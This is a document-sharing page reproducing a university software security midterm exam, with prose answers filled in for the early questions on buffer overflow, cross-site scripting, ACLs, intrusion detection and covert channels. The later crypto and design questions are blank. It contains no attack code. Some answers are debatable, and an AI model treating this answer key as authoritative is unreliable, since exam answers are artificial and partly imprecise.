Add to collection(s) Add to saved
  1. Business
  2. Finance

mid-term - University of Virginia

advertisement 
Name____________________
Mid Term Exam – Software Security
1. (10 points) Describe in detail one attack. Precisely how would it be launched? What has
to be true for it to succeed? Can the attacked entities defend themselves? How does the
attacker define success?
1) Most common answers: Distributed Denial of Service, Worm, Virus, Buffer Overflow.
2) Remote buffer overflow attack: it will be launched by sending a specifically constructed
buffer to a network application that does not check the length of the incoming buffer. The
incoming buffer is long enough to overwrite the address in the process stack that contains
the address the program counter will return to upon completion of the current procedure.
The new return address will point to the buffer the attacker sent, which contains machinecode instructions. Success is defined by the execution of the code in the buffer. The
attacked entities can defend themselves by patching insecure software.
3) Cross-site Scripting: it allows malicious users to cause arbitrary code to run during
another user’s web session. The code can take any action on the user’s computer that the
web site was authorized to take (i.e. running other code on the user’s machine). The
vulnerability occurs if the user clicks on a hyperlink provided by the malicious attacker. For
the attack to succeed, the program will not have examined user input to make sure it is
valid. This results from coding mistakes in web applications. To protect themselves web
sites should review their code and make sure it properly filters scripts.
2. (9 points) What is the difference between using capabilities and access control lists to
access protected objects along the following dimensions?
a. (cost of) storage consumed
Capabilities depend on the number of operations an object can perform, and ACL depends
on the numbers of users and objects in system. Generally, capabilities should consume
less system storage space than access control list.
b. execution performance
For ACL, it is a simple table look-up. For Capability, the dynamic computation is more
complex. It might involve traversing a list. Also, it might likely involve a trap to kernel. It also
needs to be checked for every process. Access control list should work faster than
capabilities.
c. granularity of protection – that is, how finely can you divide objects and protect one
differently from another?
Capability has a finer granularity. Capabilities could be granted per process. Processes
could pass capabilities along. Capabilities are also more specific. It is possible to make
Mid Term Exam
1
02/16/16
access control list very fine-grained as well; however, the size of the table might become
too big.
3. (20 points) You are the system administrator for the University of Virginia web and
compute servers. You are using Tripwire, USTAT, and GRID to protect your systems.
For each intrusion detection system, describe an attack that will (likely) be detected.
Tripwire:
Any attack that modifies file data in a protected system.
USTAT:
Any attack that has a distinct set of steps.
GRID:
Any attack that affects a large scale of machines that can lead to a network pattern.
Eg. Worm.
List two attacks (or kinds of attacks) that will not be caught by these security systems.
1. Denial of Service attack.
2. Buffer Overflow
3. Off-line attacks such as manipulation of components outside system execution
4. (8 points) Define
a. covert channel
A path used to transfer information in a way not intended by system designers.
b. trap door
1) A hidden piece of code that responds to a special input, allowing its user access to
resources without passing through the normal security enforcement mechanism.
2) A trapdoor one-way function is a special type of one-way function, one with a secret
trapdoor. It is easy to compute in one direction but hard in the other. But, if you know
the secret, you can easily compute the function in the other direction.
Name____________________
5. (18 points) Consider the following cryptographic message exchange protocol (using the
notation from Adabi & Needham and Burrows etal. papers):
Message 1 Y  X:
Y
Message 2 X  Y:
Nx
Mid Term Exam
2
02/16/16
Message 3 Y  X:
{ Nx } Kys
Message 4 X  S:
Y, X, { Nx } Kys
Message 5 S  X:
{ Y, Nx } Kxs
a. What are X, Y and S?
The letter K denotes a key. What is the purpose of each key?
b. Kys
c. Kxs
d. Describe what each message in the protocol accomplishes. Be sure to explain what part
Nx plays.
Msg 1:
Msg 2:
Msg 3:
Msg 4:
Msg 5:
6. (15 points) Contrast the kind of mathematical computation that needs to be encrypt a
message using the Digital Encryption Standard (DES) versus the RSA (Rivest, Shamir,
Adleman) Public-Key method.
a. What mathematical operations are performed in each?
DES:
Mid Term Exam
3
02/16/16
RSA:
b. Are they of roughly equivalent (execution) cost? Why or why not?
c. Does either computation vary with the key value?
Pledge: On my honor, I have neither given, nor received unauthorized aid on this exam.
Sign your name: ________________________
There is one more exam question. You may complete it in class, or
take it home and complete it under the honor system. See next page.
Mid Term Exam
4
02/16/16
Name____________________
CS 551/651 Software Security -- Last Mid Term Exam question.
Please turn in to Anita Jones at the latest by noon Tuesday, March 8, 2000 – electronically
or on paper. Complete this question under the honor system.
7. (20 points) Your startup company is going to solve the problem of consumers who do
not trust using their credit cards on the Internet. You are launching a new service called
cueCard. A client pays for the card at a variety of retail stores such as convenience stores
(like 7-eleven), merchandise stores (like WalMart), and the Post Office. The card has a
unique identify number and an authorization number. To purchase goods on the Internet
with a cueCard, one types in the number and the code.
There are several reasons why the client should prefer the cueCard to credit cards:
* cueCard does not involve a standing account that is integrally related to the owner
* cueCard buyer is anonymous (like someone who pays in cash)
* cueCard has limited value (that might be stolen)
* cueCard can be given to another simply by transferring two numbers
The cueCard Intl. company expects to replace money orders and to provide this new
financial transaction to complement what already exists in the form of bank
accounts/checks and credit cards. Think of the cueCard as an electronic money order.
Now consider the transactions involved between the client (the purchaser), the merchant,
and cueCard Intl. (they are essentially a bank holding the client’s funds).
Sketch the transactions (the messages that are sent) between the three parties when a
purchase is made.
(Don’t complicate the problem: assume
* that the cueCard has enough funds remaining on it to make the purchase at hand, &
* any cryptographic keys that are needed have been distributed.)
Use the message exchange format illustrated in question 1 of this exam.
Let
M represent the merchant
B represent the buyer – i.e. the client using their cueCard to make the purchase
C represent cueCard International
Specify what pre- exist? Make clear whether each key is symmetric or asymmetric.
Show the content of each message. Show what is encrypted? Do you use nonces?
Pledge: On my honor, I have neither given, nor received unauthorized aid on this exam.
Sign your name: ________________________
Mid Term Exam
5
02/16/16
Related documents
H.264 Rate Control
H.264 Rate Control
Honors Chem- Buffers Worksheet
Honors Chem- Buffers Worksheet
SCIENCE CURRICULUM MAPPING
SCIENCE CURRICULUM MAPPING
Wednesday Quiz 6 answers Chem 265 2012
Wednesday Quiz 6 answers Chem 265 2012
Determination of pH and Buffer Capacity
Determination of pH and Buffer Capacity
Problem Set III Chemistry 3100 Winter 2011 Dr. G. Van Biesen 1. By
Problem Set III Chemistry 3100 Winter 2011 Dr. G. Van Biesen 1. By
buffers
buffers
Download
advertisement